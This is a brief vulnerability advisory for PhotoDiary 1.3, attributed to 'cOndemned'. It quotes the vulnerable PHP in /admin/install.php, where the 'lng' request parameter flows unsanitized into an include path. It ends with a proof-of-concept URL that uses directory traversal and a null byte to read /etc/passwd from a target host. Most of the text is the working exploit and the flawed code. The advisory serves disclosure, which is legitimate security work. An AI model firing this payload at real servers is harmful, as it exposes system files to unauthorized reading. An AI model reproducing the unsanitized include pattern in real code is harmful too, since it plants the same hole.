PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability Discovered by cOndemned download: http://code.google.com/p/photodiary/ source of /admin/install.php (lines 9 - 15): if (isset($_GET['lng'])){ $LNG = $_GET['lng']; # 1 } else { $LNG = "ITA"; } include "../common/language_".$LNG.".php"; # 2 proof of concept: http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00